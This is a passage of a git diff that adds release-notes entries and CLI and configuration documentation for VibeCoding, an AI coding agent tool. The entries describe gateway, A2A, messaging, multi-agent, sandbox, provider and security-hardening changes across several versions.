+  - Fixed `memory.WriteAll()` path handling and kept memory update/delete scoped to the requested section
+  - Cloned gateway model settings before per-request `temperature`/`top_p` overrides
+  - Passed agent callback context/message snapshots instead of shared references
+  - Serialized cron job state transitions through the job store
+
+- **Configuration and Gateway Hardening**
+  - Gated `!command` API key resolution behind `VIBECODING_ALLOW_SHELL_CONFIG=1`
+  - Fixed Gateway CORS to echo only the allowed request origin
+  - Added a startup warning when Gateway listens beyond loopback in `yolo` mode without authentication
+  - Hardened platform home/shell fallback behavior
+
+### 🧪 Tests
+
+- Added regression coverage for A2A auth, task ID uniqueness, task snapshot isolation, and persisted working task messages
+- Added coverage for path traversal, unsafe session IDs, memory section operations, ACP cleanup, CORS behavior, UTF-8 truncation, and shell-config opt-in
+- Ran focused package tests plus race tests for A2A, agent, gateway, and cron
+
+### 📝 Docs
+
+- Updated A2A, Hermes, Gateway, configuration, and security docs for the new authentication and hardening behavior
+
+## v0.1.30
+
+### ✨ Features
+
+- **Per-Provider HTTP Proxy**
+  - Added `providers.<name>.httpProxy` to route individual providers through different HTTP proxies
+  - Kept default environment proxy behavior when a provider does not set `httpProxy`
+
+- **Google Gemini and Vertex Vendor Adapters**
+  - Added native `google-gemini` and `google-vertex` providers using Google `streamGenerateContent`
+  - Enabled base URL detection for Gemini API and Vertex AI native Gemini endpoints
+  - Added default Google provider templates for Gemini API keys and Vertex bearer tokens
+  - Updated provider documentation and lookup coverage for Google vendor names
+
+- **Hosted Web Search Tool**
+  - Added `--web-search` for CLI and ACP runs
+  - Added top-level `webSearch` settings with `enabled`, `provider`, `providerType`, and `model`
+  - Registered hosted `web_search` tools only when enabled, keeping them separate from local function tools
+  - Added OpenAI Responses API mapping to `web_search`
+  - Updated Responses web search mapping to provider-neutral `web_search`, so compatible custom providers are not required to be named `openai`
+  - Added Anthropic Messages API mapping to `web_search_20250305`
+  - Preserved `webSearch.model` as provider-neutral metadata for future routing and cost display
+
+- **Default Provider Templates**
+  - Added built-in default provider entries for OpenAI, Anthropic, and Xiaomi MiMo
+  - Kept DeepSeek providers and `deepseek-openai` as the default provider/model
+  - First-run `settings.json` now includes disabled web search configuration plus OpenAI/Anthropic/Xiaomi provider templates
+
+### 🧪 Tests
+
+- Added coverage for hosted web search tool serialization across OpenAI Responses and Anthropic Messages
+- Added coverage for web search configuration defaults, CLI flag parsing, and hosted tool metadata propagation
+- Added coverage for macOS default config directory resolution
+
+### 🐛 Bug Fixes
+
+- **macOS Config Directory**
+  - Unified the default macOS global config directory with Linux at `~/.vibecoding`
+
+- **Release Versioning**
+  - Removed the default `dirty` suffix from npm and distribution package version detection
+  - Normalized npm package metadata to `0.1.30`
+
+## v0.1.29
+
+### 🐛 Bug Fixes
+
+- **NPM Package Wrapper**
+  - Fixed `npm/bin/vibecoding` entry script to ensure installer packages ship the correct executable wrapper
+  - Adjusted `build-npm.sh` and `build-npm-packages.sh` to include the wrapper consistently
+
+## v0.1.28
+
+### ✨ Features
+
+- **Per-Model Temperature/Top-P Configuration**
+  - Added `temperature` and `top_p` fields to `ModelConfig` and `Model` for per-model parameter tuning
+  - Wired through OpenAI and Anthropic providers with `omitempty` — `nil` means use API default
+  - Wired through provider factory, agent loop, and ACP mode
+  - Gateway supports per-request `temperature`/`top_p` override via `ChatParams`
+  - When not configured, parameters are omitted entirely (no zero-value sent to API)
+
+- **OpenAI Responses API Support**
+  - Added a dedicated OpenAI Responses provider path under `api: "openai-responses"`
+  - Supports Responses streaming, tool calls, reasoning summaries, and prompt cache parameters
+  - Responses configuration is exposed under provider `responses` settings with default prompt cache enabled
+  - Added model compat flags for `supportsPromptCacheKey` and `supportsReasoningSummary`
+
+### 🧪 Tests
+
+- Improved provider test coverage for OpenAI Responses API and Anthropic request parsing
+- Reworked Anthropic tests to use in-memory HTTP mocks instead of port-binding test servers
+
+### 📝 Docs
+
+- Updated `AGENTS.md` version to v0.1.28
+
+## v0.1.27
+
+### ✨ Features
+
+- **Hermes Mode** (`vibecoding hermes`)
+  - New messaging gateway mode for WeChat, Feishu, and WebSocket
+  - Persistent per-user sessions with auto-archiving on `/new`
+  - Default `yolo` mode for unattended operation
+  - Smart approvals with tiered risk classification (low/medium/high)
+  - User whitelist for platform access control
+  - WebSocket streaming: real-time text_delta/think_delta/tool_call/tool_result/tool_diff/usage/done events
+
+- **A2A Protocol** (`vibecoding a2a`)
+  - New Agent-to-Agent protocol server (JSON-RPC 2.0 over HTTP + SSE streaming)
+  - Standalone mode: `vibecoding a2a start` (port 8093)
+  - Integration mode: `hermes.json` `a2a.enabled: true` shares hermes HTTP port
+  - Agent Card at `/.well-known/agent.json`
+  - Task lifecycle: submitted → working → completed/failed/canceled
+  - REST endpoints: `/a2a/send`, `/a2a/task`, `/a2a/task/cancel`, `/a2a/events`
+  - **A2A Client**: `vibecoding a2a send <message>` to send tasks to other A2A servers
+  - **A2A Discovery**: `vibecoding a2a discover <url>` to fetch remote Agent Cards
+  - **A2A Scheduling**: Cron jobs support `--a2a-target` to schedule tasks to A2A servers
+
+- **A2A Master Mode** (`--enable-a2a-master`)
+  - Configure multiple remote A2A agents via `a2a-list.json`
+  - Registers `a2a_dispatch` tool for the LLM to automatically dispatch tasks to remote agents
+  - Supports global (`~/.vibecoding/a2a-list.json`) and project-level (`.vibe/a2a-list.json`) config
+  - `--init-a2a-master-config` generates a sample config file
+  - Disabled by default, requires explicit opt-in
+
+- **A2A Config Initialization**
+  - `vibecoding a2a --init-a2a-config` generates `a2a.json` config template
+  - `vibecoding --init-gateway` generates `gateway.json` config template (existing)
+  - `vibecoding --init-a2a-master-config` generates `a2a-list.json` config template
+  - All `--init-*` flags support `--force` to overwrite existing files
+
+- **Scenarios & Walkthroughs Documentation**
+  - New `docs/scenarios.md` (zh + en) covering 9 practical usage scenarios
+  - Covers: daily coding, CI integration, multi-agent, VS Code ACP, A2A server,
+    A2A Master cross-machine dispatch, Gateway HTTP, Hermes messaging, combined modes
+
+- **Documentation Overhaul**
+  - `architecture.md`: added all missing modules (a2a/acp/gateway/hermes/mcp/memory/messaging/vendored)
+  - `tools.md`: added `a2a_dispatch` and `skill_ref` tool docs
+  - `cli-reference.md`: added `--enable-a2a-master`, `--init-a2a-master-config`,
+    `--init-gateway`, `--force`, `a2a` subcommand docs
+  - `README.md`: updated architecture diagram, added running modes overview
+
+- **Pressure System**
+  - Context Pressure: `EventContextPressure` fired at 55% context usage (configurable via `context_pressure_threshold`)
+  - Budget Pressure: `EventBudgetPressure` fired at 20% remaining iterations (configurable via `budget_pressure_threshold`)
+  - One-shot events: fire once per threshold crossing, not every turn
+  - Messaging platforms receive pressure warnings via progress callback
+
+- **Smart Approvals (Tiered Strategy)**
+  - Low risk: auto-approve
+  - Medium risk: auto-approve + notify user
+  - High risk (WebSocket): send `approval_request`, wait for user `approval_response` (5min timeout)
+  - High risk (messaging): auto-reject + notify user
+  - Command risk classification: low/medium/high based on bash command patterns
+
+- **Provider/Model Configuration**
+  - `default_provider` / `default_model` in `hermes.json` (overrides `settings.json`)
+  - CLI flags `-p`/`--provider` and `-m`/`--model` for `hermes start`
+  - Priority: CLI flags > `hermes.json` > `settings.json`
+
+- **Multi-Agent Mode** (`--multi-agent`)
+  - Enables sub-agent tools (spawn/status/send/destroy) in hermes sessions
+  - Configurable via `hermes.json` `multi_agent` field or `--multi-agent` CLI flag
+
+- **Sandbox Mode** (`--sandbox`)
+  - Optional bwrap sandbox isolation (disabled by default)
+  - Configurable via `hermes.json` `sandbox` field or `--sandbox` CLI flag
+
+- **MCP Integration**
+  - Hermes automatically loads MCP servers from global/project `mcp.json`
+  - MCP tools registered per-session, connections auto-closed on session removal
+
+- **Progress Events for Messaging Platforms**
+  - Real-time tool execution progress sent to WeChat/Feishu during agent runs
+  - Format: `[tool]: args ✅/❌` for tools, `💭 ...` for thinking process
+  - Final summary sent after agent completes
+
+- **Memory Tool**
+  - `memory` tool with read/add/update/delete actions
+  - Section-level operations (User Profile, Working Memory, Lessons Learned)
+  - Defaults to `.vibe/memory.md` (project directory)
+  - Lookup priority: `memory.path` config → `.vibe/memory.md` → `<GLOBAL_DIR>/memory.md`
+  - `/api/memory` HTTP endpoint (GET/PUT) for memory access
+
+- **Hermes CLI Commands**
+  - `hermes start` — start daemon with all CLI flags
+  - `hermes stop` — stop daemon via PID file + SIGTERM
+  - `hermes status` — check daemon status via PID + HTTP health
+  - `hermes client` — WebSocket client with streaming output and slash commands
+  - `hermes config init/show` — configuration management
+  - `hermes wechat login/status` — WeChat iLink management
+  - `hermes feishu setup/status` — Feishu configuration
+  - `hermes webhook list` — webhook route listing
+  - `hermes memory show/clear` — memory management
+  - `hermes sessions list` — active session listing (queries running instance)
+  - `hermes cron list/add/remove/enable/disable` — cron job management
+  - `a2a start/stop/status/card` — A2A server management
+
+### 📝 Changes
+
+- WeChat iLink implementation with zero external dependencies (5 files: types/protocol/auth/crypto/wechat)
+- Feishu bot with official SDK and WebSocket long-connection
+- Shell hooks for pre/post tool call external scripts (JSON stdin/stdout)
+- Webhook inbound routing with HMAC-SHA256 signature verification
+- WebSocket uses `golang.org/x/net/websocket` (stdlib compatible)
+- PID file-based daemon management for hermes stop/status
+
+### 🐛 Bug Fixes
+
+- **NPM Installer Packaging**
+  - Fixed release packaging flow so `vibecoding-installer` always ships executable entry `bin/vibecoding`.
+  - Added `scripts/npm-installer-wrapper.js` as the single source of wrapper logic, reused by both
+    `scripts/build-npm.sh` and `scripts/build-npm-packages.sh` to avoid drift.
+  - Adjusted `npm/.npmignore` and `npm/bin` handling to avoid shipping accidental build artifacts and to keep
+    package manifests (`files`) explicit.
+
+- **Hermes Webhook Delivery and Filtering**
+  - Webhook routes now treat unknown event types as non-matching unless the route explicitly allows `*`.
+  - Added `delivery_target` to webhook routes so WeChat/Feishu delivery has a concrete recipient.
+  - Updated webhook route listing and config templates to show the delivery target when present.
+
+- **OpenAI Responses Thinking Mapping**
+  - Mapped `--thinking xhigh` to `reasoning.effort: "high"` for the OpenAI Responses API.
+
+### 🧪 Tests
+
+- Reworked webhook router tests to wait on handler completion instead of sleeping, removing a race/flakiness source.
+- Added coverage for webhook event rejection when the event type cannot be inferred.
+- Added coverage for webhook delivery target handling.
+
+## v0.1.26
+
+### ✨ Features
+
+- **Gateway Mode** (`vibecoding gateway`)
+  - New HTTP server exposing a standard OpenAI Chat Completions API (`/v1/chat/completions`, `/v1/models`, `/health`)
+  - Any OpenAI-compatible client (Cursor, Continue, Open WebUI, Python SDK, etc.) can connect directly
+  - Streaming (SSE) and non-streaming responses fully supported
+  - Backend powered by VibeCoding agent loop with tool execution transparent to the caller
+
+- **Multi-Session Support**
+  - Built-in `SessionPool` for concurrent sessions, each with isolated agent, tools, and message history
+  - Session association via `x_session_id` in request body; auto-created when absent
+  - Configurable idle timeout (`session.idleTimeoutSeconds`) and max session limit (`session.maxSessions`)
+
+- **Sub-Agent Support in Gateway**
+  - Optional `enableSubAgents` config to enable multi-agent orchestration in gateway mode
+  - Reuses existing `AgentFactory` / `AgentManager` / sub-agent tools with no core agent changes
+
+- **Bearer Token Authentication**
+  - Configurable via `gateway.json` with `auth.enabled` and `auth.tokens` list
+  - Disabled by default; `/health` endpoint always unauthenticated
+
+- **Slash Commands via API**
+  - `/clear`, `/mode`, `/model`, `/models`, `/sessions`, `/compact`, `/status`, `/skill`, `/skills`, `/help`
+  - Triggered when the last user message starts with `/`; processed at gateway layer without invoking LLM
+  - Responses use standard OpenAI format with `x_command` extension field
+
+- **Tool Visibility Configuration** (`toolVisibility.mode`)
+  - `"content"` (default): tool status sent as text in `content` field during streaming
+  - `"sse_event"`: tool status sent as extended SSE events for custom clients
+  - `"none"`: fully transparent, client sees only final text
+
+- **System Prompt Handling** (`systemPromptMode`)
+  - `"append"` (default): client system messages appended to built-in system prompt
+  - `"ignore"`: client system messages discarded entirely
+
+- **Security: allowedWorkDirs**
+  - Directory whitelist for `x_working_dir` request-level overrides with path-separator-aware prefix matching
+  - Three-layer security model: L1 auth + L2 directory control + L3 sandbox (bwrap)
+
+- **Sandbox Support in Gateway**
+  - Configurable via `gateway.json` `sandbox.enabled` / `sandbox.level` or `--sandbox` flag
+  - Inherits detailed sandbox settings (allowedRead, deniedPaths, etc.) from `settings.json`
+
+- **Gateway Configuration** (`gateway.json`)
+  - Independent config file at `~/.vibecoding/gateway.json`
+  - Covers: listen address, auth, mode, sandbox, workingDir, allowedWorkDirs, session management, CORS, tool visibility, system prompt mode, request timeout, concurrency limit, logging
+  - `vibecoding --init-gateway` to generate template; `--force` to overwrite
+
+- **Request Timeout & Concurrency**
+  - `requestTimeoutSeconds` (default 1800s); streaming keeps alive as long as data flows
+  - `maxConcurrentRequests` (default 0 = unlimited)
+
+### 📝 Docs
+
+- Added `docs/gateway-proposal.md` with full architecture, API design, security model, and implementation plan
+- Updated `AGENTS.md` version note
+
+## v0.1.25
+
+### ✨ Features
+
+- **Multi-Agent Mode**
+  - Added opt-in `--multi-agent` support across CLI, TUI, and ACP mode
+  - Added `AgentManager`, `EventRouter`, and per-agent registries so agents have isolated tools, job managers, sessions, messages, and context
+  - Added `subagent_spawn`, `subagent_status`, `subagent_send`, and `subagent_destroy` tools for delegated background work
+  - Added multi-agent prompt guidance and safeguards that prevent nested sub-agent spawning
+
+- **Cron Task Support**
+  - Added `internal/cron` with persistent cron store and scheduler coverage
+  - Added `/cron` command entry points in multi-agent TUI workflows
+
+- **Provider Vendor Adapter Layer**
+  - Added vendor adapter registration in `internal/provider/vendor*.go`
+  - Centralized provider/model creation in `internal/provider/factory`
+  - Added vendor detection for DeepSeek, Xiaomi, Kimi, MiniMax, Seed, Qianfan, Bailian, Gitee, OpenRouter, Together, Groq, Fireworks, OpenAI, and Anthropic
+  - Preserved existing provider config format while allowing vendor-specific defaults and generic OpenAI/Anthropic-compatible fallback
+  - Added model `compat` handling for thinking formats, reasoning effort support, max token field selection, adaptive Anthropic thinking, and DeepSeek/Xiaomi assistant `reasoning_content`
+
+### 🐛 Bug Fixes
+
+- Auto-initialized sessions on first append so sub-agents can write session entries without requiring explicit prior initialization
+- Fixed sub-agent tests to wait for background runs and clean up spawned agents before temporary directory removal
+- Preserved ACP Anthropic cache-control behavior while moving provider creation to the shared factory
+
+### 📝 Docs
+
+- Updated `AGENTS.md` with provider factory and vendor adapter guidance
+- Replaced the multi-agent implementation checklist with a completed architecture/status document
+- Removed the obsolete root `todo.md`
+
+### 🧪 Testing
+
+- Added coverage for provider vendor resolution, provider factory creation, OpenAI/Anthropic compat behavior, multi-agent manager/router/sub-agent flows, cron storage/scheduler behavior, and session auto-initialization
+- Verified with `make test` (`go test -v -race ./...`)
+
+---
+
+## v0.1.24
+
+### ✨ Features
+
+- **API Retry with Exponential Backoff**
+  - Automatic retry for transient errors (5xx, network failures, rate limits) on initial HTTP connection
+  - Exponential backoff: `baseDelay × 2^attempt`, capped at 30 seconds
+  - Does NOT retry on user abort (`context.Canceled`), 4xx client errors, or mid-stream failures
+  - Configurable via `retry` settings (`maxRetries`, `baseDelay`, `maxDelay`)
+  - Agent forwards retry events as status updates visible in TUI and print mode
+  - ACP mode also receives retry configuration
+
+### 🐛 Bug Fixes
+
+- **Anthropic `cache_control` Now Opt-In**
+  - Changed default `cache_control` behavior to off (was auto-enabled for official API base URL)
+  - Require explicit `cacheControl: true` in provider config to enable prompt caching
+  - ACP provider creation explicitly enables `cache_control` for Anthropic
+
+- **Anthropic Tool Result Grouping**
+  - Fixed consecutive `toolResult` messages to be grouped into a single `user` message
+  - Anthropic API requires all `tool_result` blocks for preceding `tool_use` to appear together before other content
+  - Image blocks from tool results are now appended after all result blocks in the same message
+  
+- **Agent Tool-Only Loop Warning Ordering**
+  - Moved the no-text tool-loop warning to be injected after tool results are appended
+  - Keeps assistant -> toolResult -> warning message ordering valid for provider and session transcripts
+  - Warning messages are now also persisted to session storage
+
+### 📝 Docs
+
+- **Comprehensive Configuration Documentation Rewrite**
+  - Added missing settings: `cacheControl`, idle compression, full sandbox fields (`bwrapPath`, `allowedRead`, `allowedWrite`, `deniedPaths`, `passEnv`, `tmpSize`), `shellPath`, `shellCommandPrefix`, `sessionDir`, `skillsDir`, `theme`, `retry`
+  - Documented shell command `apiKey` format (`!cmd`) for password manager integration
+  - Fixed key resolution order: config `apiKey` first, then derived env var
+  - Updated macOS config path documentation
+  - Added top-level fields reference table with all defaults
+  - Added per-platform defaults for sandbox paths and env vars
+  - Improved examples with Claude provider `cacheControl`, idle compression, project-level overrides, and custom sandbox paths
+
+### 🧪 Testing
+
+- Added retry tests covering `IsRetryable`, `RetryDelay`, and `FormatRetryMessage`
+- Added Anthropic provider tests for consecutive tool result grouping
+- Added a regression test covering tool-only warning placement after tool results
+
+
+---
+
+## v0.1.23
+
+### 🛠 Improvements
+
+- **DeepSeek Thinking Format**
+  - Added `thinkingFormat: "deepseek"` for DeepSeek reasoning requests
+  - OpenAI-compatible requests now send `thinking: {type: "enabled"}` with `reasoning_effort`
+  - Anthropic-compatible requests now send `thinking: {type: "enabled"}` with `output_config.effort`
+  - Kept `thinkingFormat: "xiaomi"` as the legacy thinking-only format
+
+### 🧪 Testing
+
+- Added provider tests covering the new `deepseek` thinking format for both OpenAI- and Anthropic-compatible requests
+
+### 📝 Docs
+
+- Updated `anthropic-api` skill and configuration docs for the new `thinkingFormat` option
+
+---
+
+## v0.1.22
+
+### ✨ Features
+
+- **CLI/TUI MCP Auto-Loading**
+  - CLI/TUI startup now loads global and project `mcp.json`, connects configured MCP servers, and registers MCP tools before the agent tool list is frozen
+
+### 🐛 Bug Fixes
+
+- **Markdown Rendering Style**
+  - Switched CLI print mode and TUI markdown rendering from Glamour auto-style detection to the fixed `dark` style for more consistent terminal output
+
+### 🧪 Testing
+
+- Added MCP config loader coverage for placeholder template filtering
+
+### 🛠 Improvements
+
+- **Shared MCP Runtime**
+  - Moved MCP connection/tool registration out of ACP-only code into a shared runtime used by ACP and normal CLI/TUI sessions
+  - Starter-template placeholder MCP servers are ignored during automatic startup loading
+
+---
+
+## v0.1.21
+
+### ✨ Features
+
+- **Plan/Apply Workflow**
+  - Added a built-in `plan` tool for structured task plans with `pending`, `running`, `done`, and `failed` step statuses
+  - TUI now shows the current task plan and records plan updates in the transcript
+  - Print mode and ACP now surface plan updates for non-interactive and editor-client flows
+
+- **Apply Confirmation**
+  - Added `approval.confirmBeforeWrite` to require approval before `write` and `edit` in agent mode
+  - Enabled write/edit confirmation by default in generated settings
+  - TUI approval prompts summarize write content by byte size instead of dumping full file content
+
+- **MCP Config Commands**
+  - Added `/init_mcp` to create project/global `mcp.json` with `basic`/`full` templates and optional `--force`
+  - Added `/mcps` to list MCP servers from global and project `mcp.json` files
+  - MCP config is now maintained in standalone `mcp.json` (separate from `settings.json`)
+
+### 🧪 Testing
+
+- Added coverage for the `plan` tool and write/edit approval gating
+- Added HTTP-based MCP integration tests for tool/resource/prompt registration and callback paths
+- Added SSE-based MCP integration tests for stream callbacks and message endpoint request/response flow
+
+### 🛠 Improvements
+
+- **ACP MCP Hardening**
+  - Added MCP transport support for `http` and `sse` (alongside existing `stdio`)
+  - Added MCP initialize/tool-discovery timeouts to avoid hanging ACP sessions
+  - Added paginated `tools/list` fetching with upper page bounds
+  - Added MCP `resources/*` and `prompts/*` discovery and tool registration
+  - Added duplicate MCP server-name detection and MCP tool-name de-duplication
+  - Added MCP inbound request/notification handling (`ping`, progress/logging/cancel notifications)
+  - Added bridge for inbound `sampling/createMessage` to the active ACP provider/model
+  - Added stricter close/error propagation
+
+---
+
+## v0.1.20
+
+### ✨ Features
+
+- **Structured File Change Reporting**
+  - `write` and `edit` now attach structured file diff metadata to tool results
+  - TUI tool details show full unified diffs while collapsed tool rows keep a compact `+N -N` summary
+  - Print mode now emits clear file change summaries for non-interactive runs
+  - ACP tool updates include diff metadata in raw output for compatible clients
+
+### 🧪 Testing
+
+- Added coverage for structured diff metadata from `write` and `edit`
+
+---
+
+## v0.1.19
+
+### ✨ Features
+
+- **TUI Tool Details Modal**
+  - Replaced `Ctrl+O` toggle-expand with a scrollable full-screen modal overlay showing all tool calls and results
+  - Supports PgUp/PgDn, Up/Down, Home/End navigation; Esc/Ctrl+O/q to close
+  - Tool headers now display file paths; removed content truncation in tool args display
+  - Write tool results show diff summary in the one-line summary line
+  - Key input is blocked while the modal is open to prevent accidental actions
+
+- **Write Tool Diff Summary**
+  - `write` tool now computes LCS-based line-level diff when overwriting files
+  - Returns structured diff info (`+N -N` with line ranges) in the tool result
+  - Skips diff computation for very large files (>200K line pairs) to avoid memory pressure
+
+### 🛠 Improvements
+
+- **Unified Shell Args Across Sandbox Backends**
+  - All sandbox backends (`none`, `mac`, `windows`) now use `platform.ShellArgs()` for cmd.exe/PowerShell argument construction
+  - Fixes Windows cmd.exe and PowerShell commands in sandboxed execution modes
+  - `ShellArgs` now normalizes shell name to lowercase before matching
+
+### 🧪 Testing
+
+- Added `TestNoneSandboxWrapCommandUsesPlatformShellArgs` covering cmd.exe and PowerShell argument generation
+
+---
+
+## v0.1.18
+
+### 🐛 Bug Fixes
+
+- **TUI Nil Pointer Panic**
+  - Fixed a nil pointer panic in `printMessageOnce` when `printedMessageIdx` map was not initialized
+  - Added nil check before accessing the map in the message printing logic
+
+- **Stream Commit Before Tool Execution**
+  - Added `commitActiveStream()` method to flush streaming content (thinking and assistant messages) to output before tool execution
+  - Now properly commits active stream before `EventToolCall` and `EventToolApprovalRequest` handling
+  - Ensures thinking and partial assistant responses are visible when tools run or approval is requested
+
+### 🧪 Testing
+
+- Added `TestHandleAgentEventCommitsStreamBeforeApproval` regression test for stream commit ordering
+
+---
+
+## v0.1.17
+
+### 🛠 Improvements
+
+- **TUI Native Scrollback**
+  - Reworked TUI history rendering so completed messages are printed into the terminal's native scrollback instead of a fixed-height viewport
+  - Removed the virtual scrollbar and mouse-capture approach; mouse wheel scrolling now uses normal terminal history behavior
+  - Kept live streaming content, input, footer, context/cache status, and tool output controls in the Bubble Tea view
+
+- **TUI Request Timers**
+  - Added per-request elapsed time display while a response is running
+  - Footer now keeps the last request duration after completion
+
+- **Event Loop Decoupling**
+  - Added shared agent event consumption helpers
+  - Split the TUI agent-event bridge out of the main app file and reused the event loop from CLI print mode
+
+- **Windows Console Compatibility**
+  - Enabled Windows virtual terminal console modes where available for better PowerShell rendering on Windows 10
+
+### 🐛 Bug Fixes
+
+- Fixed a TUI startup deadlock caused by printing initial/session history before Bubble Tea had started consuming program messages
+- Fixed an agent message-history data race found by `go test -race`
+- Fixed mock provider cancellation handling for already-canceled contexts
+
+### 🧪 Testing
+
+- Full `make test` now passes with race detection
+- Added TUI regression coverage for startup history printing without blocking
+- Hardened tests that depend on local HTTP listeners or default home-directory session paths in restricted environments
+
+---
+
+## v0.1.16
+
+### 🛠 Improvements
+
+- **Session Open by ID or Path**
+  - New `OpenByPathOrID` function allows opening sessions by either file path or session ID
+  - `OpenByID` now supports prefix matching with ambiguity detection
+  - `ContinueRecent` initializes new sessions immediately so they are ready for messages
+
+- **Session Save Error Handling**
+  - `AppendMessage` and `AppendCompaction` now return errors to the caller
+  - Agent loop surfaces session-save failures as `EventError` instead of silently dropping them
+
+- **Vendored Tool Test Guard**
+  - Makefile `test` target now depends on `prepare-vendored` and a new `test-vendored` check
+  - Tests fail early with a clear message if `rg`/`fd` binaries are missing for the current platform
+
+### 🧪 Testing
+
+- Added CLI flag parsing tests for root and ACP subcommands
+- Added settings merge tests covering project overrides and environment variables
+- Added session tests for `OpenByPathOrID`, prefix ambiguity, corrupt lines, and parent chain tracking
+
+---
+
+## v0.1.15
+
+### 🐛 Bug Fixes
+
+- **Vendored Search Tool Availability**
+  - Fixed `grep` and `find` so they prepare embedded `rg` / `fd` binaries on demand instead of failing when vendored tools have not been extracted yet
+  - Restored executable permissions for already-extracted vendored binaries to avoid `permission denied` failures on reuse
+
+- **Bash Tool Result Handling**
+  - Fixed bash tool responses to report stdout, stderr, working directory, and exit code in a stable structured format
+  - Preserved non-zero command exits as normal tool results with explicit `exit_code` output instead of mixing shell failures into transport-level errors
+  - Standardized empty stdout/stderr rendering as `(no output)` for more predictable downstream handling
+
+---
+
+## v0.1.14
+
+### 🐛 Bug Fixes
+
+- **Session Continue Context Injection (`-c`)**
+  - Fixed a TUI state coupling issue where continued sessions could display history but fail to inject that history into the model context for follow-up prompts
+  - Split session history state into separate UI-display and agent-injection flags to ensure resumed conversations keep prior context
+  - Reset agent history-injection state consistently when the agent is recreated (abort/mode/model/skill/session switches)
+  - Added missing TUI handlers for `EventStatus` and `EventMessageStart` so status/warning messages are rendered reliably
+
+### 🧪 Testing
+
+- Added regressions that cover:
+  - history injection when UI history is already loaded
+  - real startup ordering (`Init()` history load, then follow-up input) for continued sessions
+
+---
+
+## v0.1.13
+
+### 🐛 Bug Fixes
+
+- **Streaming Event and Tool Call Robustness**
+  - Preserved terminal agent events in the TUI event listener so done/error/status handling is not dropped during streaming
+  - Added Anthropic thinking signature streaming and replay support, and surfaced SSE `error` events as proper stream errors
+  - Generated fallback tool call IDs for OpenAI-compatible streamed tool calls when providers omit IDs, with an extra defensive fallback in the agent loop
+
+- **Sandbox Environment Inheritance**
+  - Fixed `none` sandbox execution so commands inherit the parent environment, including variables such as `$HOME`
+  - Clarified bubblewrap environment override handling to match runtime behavior
+
+### 🛠 Improvements
+
+- **Vendored Tool Build Flow**
+  - Unified build and distribution targets around `prepare-vendored`
+  - Removed the old `vendored-tools` release step and deprecated the stale extract helper script
+
+- **Documentation Site Layout**
+  - Expanded the docs landing page content width for better large-screen readability
+
+- **Package Metadata**
+  - Updated npm package versions for installer packages
+
+### 📖 Documentation
+
+- Updated README and docs landing pages to highlight safer approval handling, unified cache metrics, and consistent provider debugging
+- Simplified `AGENTS.md` guidance for repository agents
+
+### 🧪 Testing
+
+- Added bash tool output coverage for stdout-only, stderr-only, no-output, and non-zero exit cases
+- Added TUI regression tests for status/warning rendering and done/error event passthrough
+- Added OpenAI streaming regression coverage for tool calls with missing IDs
+
+---
+
 ## v0.1.12
 
 ### 🐛 Bug Fixes
@@ -529,4 +1285,4 @@
 
 ---
 
-**Full Changelog**: https://github.com/startvibecoding/vibecoding/compare/v0.0.1...v0.0.7
+**Full Changelog**: https://github.com/startvibecoding/vibecoding/compare/v0.1.26...v0.1.27
diff --git a/docs/en/cli-reference.md b/docs/en/cli-reference.md
index 1f51c4a..88907ac 100644
--- a/docs/en/cli-reference.md
+++ b/docs/en/cli-reference.md
@@ -18,6 +18,7 @@ Alias: `vc`
 | `--model` | `-m` | Default from config file | Model ID |
 | `--mode` | `-M` | `agent` | Run mode (plan, agent, yolo) |
 | `--thinking` | `-t` | `off` | Thinking level (off, minimal, low, medium, high, xhigh) |
+| `--multi-agent` | - | `false` | Enable multi-agent tools and commands |
 
 ### Session Management
 
@@ -46,6 +47,10 @@ Alias: `vc`
 
 | Parameter | Short | Description |
 |-----------|-------|-------------|
+| `--init-gateway` | - | Create `gateway.json` config template |
+| `--init-a2a-master-config` | - | Create `a2a-list.json` config template |
+| `--enable-a2a-master` | - | Enable A2A master mode (remote agent dispatch) |
+| `--force` | - | Force overwrite existing files (used with `--init-*`) |
 | `--version` | `-v` | Show version |
 | `--help` | `-h` | Show help |
 
@@ -70,9 +75,31 @@ Supports VS Code, JetBrains IDEs, and any ACP-compatible editor.
 | `--sandbox` | - | false | Enable sandbox |
 | `--verbose` | - | false | Verbose output |
 | `--debug` | - | false | Debug logging |
+| `--multi-agent` | - | false | Enable multi-agent tools for ACP sessions |
 
 See the [ACP Protocol](acp.md) documentation for IDE integration details.
 
+### `a2a` - A2A Protocol Server
+
+Run the A2A (Agent-to-Agent) protocol server, supporting standalone and integrated modes.
+
+```
+vibecoding a2a [command]
+```
+
+| Subcommand | Description |
+|------------|-------------|
+| `start` | Start A2A server |
+| `stop` | Stop A2A server |
+| `status` | Show server status |
+| `card` | Show/generate Agent Card |
+| `send <message>` | Send task to remote A2A server |
+| `discover <url>` | Discover remote Agent Card |
+| `--init-a2a-config` | Create `a2a.json` config template |
+| `--force` | Force overwrite existing config file |
+
+See [A2A Protocol](a2a.md) documentation for details.
+
 ## Usage Examples
 
 ### Basic Usage
@@ -114,6 +141,18 @@ vibecoding -M agent
 vibecoding -M yolo
 ```
 
+### Multi-Agent Mode
+
+```bash
+# Enable sub-agent tools and multi-agent commands
+vibecoding --multi-agent
+
+# ACP sessions can also opt in
+vibecoding acp --multi-agent
+```
+
+When enabled, VibeCoding registers the `subagent_*` tools and exposes multi-agent workflows such as delegated background investigation. Cron command entry points also depend on multi-agent mode.
+
 ### Thinking Levels
 
 ```bash
diff --git a/docs/en/configuration.md b/docs/en/configuration.md
index 6f8889c..30eae33 100644
--- a/docs/en/configuration.md
+++ b/docs/en/configuration.md
@@ -10,9 +10,11 @@ VibeCoding uses two configuration files:
 | `%APPDATA%\vibecoding\settings.json` | Windows | Global (all projects) | Low |
 | `.vibe/settings.json` | All | Project-level | High |
 
+> **Tip:** You can override the global config directory with the `VIBECODING_DIR` environment variable.
+
 > **Windows:** `%APPDATA%` resolves to `C:\Users\<Username>\AppData\Roaming`, so the full path is typically `C:\Users\<Username>\AppData\Roaming\vibecoding\settings.json`.
 
-Project-level configuration overrides global configuration.
+Project-level configuration overrides global configuration. When both exist, scalar fields from the project file overwrite the global values; the `providers` map is deep-merged per-key (project providers are added to or replace global providers, not the entire map).
 
 ## Configuration Structure
 
@@ -25,19 +27,23 @@ Project-level configuration overrides global configuration.
       "baseUrl": "https://api.deepseek.com/anthropic",
       "apiKey": "${DEEPSEEK_API_KEY}",
       "api": "anthropic-messages",
+      "thinkingFormat": "deepseek",
+      "cacheControl": false,
       "models": [
         {
           "id": "deepseek-v4-flash",
